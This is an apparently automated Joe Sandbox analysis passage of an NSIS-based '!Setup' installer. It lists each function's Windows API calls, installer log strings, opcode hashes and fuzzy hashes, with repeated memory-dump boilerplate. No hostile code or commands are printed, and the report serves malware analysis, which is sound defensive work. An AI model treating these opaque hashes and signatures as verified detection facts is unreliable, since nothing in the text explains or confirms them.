Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: "%s" (%d), xrefs: 004017BF
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Rename failed: %s, xrefs: 0040194B
Call: %d, xrefs: 0040165A
Sleep(%d), xrefs: 0040169D
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Aborting: "%s", xrefs: 0040161D
SetFileAttributes failed., xrefs: 004017A1
Rename on reboot: %s, xrefs: 00401943
detailprint: %s, xrefs: 00401679
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Jump: %d, xrefs: 00401602
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
CreateDirectory: "%s" created, xrefs: 00401849
BringToFront, xrefs: 004016BD
Rename: %s, xrefs: 004018F8

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

.DEFAULT\Control Panel\International, xrefs: 004059C5
.exe, xrefs: 00405A69
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
@jG, xrefs: 00405AF2
RichEdit, xrefs: 00405BF0
_Nb, xrefs: 00405AFD
RichEdit20A, xrefs: 00405BE2, 00405BE7
RichEd32, xrefs: 00405BD4
RichEd20, xrefs: 00405BC9
F, xrefs: 00405A22
"F, xrefs: 00405A4B

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,%IsraeliSales%,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,%IsraeliSales%,%IsraeliSales%,00000000,00000000,%IsraeliSales%,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: error, user cancel, xrefs: 00401B93
File: error, user abort, xrefs: 00401B53
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: wrote %d to "%s", xrefs: 00401BD0
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user retry, xrefs: 00401B40
%IsraeliSales%, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error creating "%s", xrefs: 00401AF0

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: %IsraeliSales%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-1599634701
Opcode ID: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

_/, xrefs: 00403632
soft, xrefs: 004036A1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Error launching installer, xrefs: 00403603
Null, xrefs: 004036AA
Inst, xrefs: 00403698

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$_/$soft
API String ID: 4283519449-3680460245
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00427976,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

y9B, xrefs: 00403458, 0040346A
pAB, xrefs: 004033AB
vyB, xrefs: 0040346F, 0040348A, 00403513
(]C, xrefs: 004033FD
... %d%%, xrefs: 004034C8

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$vyB$y9B
API String ID: 651206458-2231457358
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(006BB930), ref: 00402387

Strings

%IsraeliSales%, xrefs: 00401EFB, 00401F00, 00401F1A
Exch: stack < %d elements, xrefs: 00401ED8
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
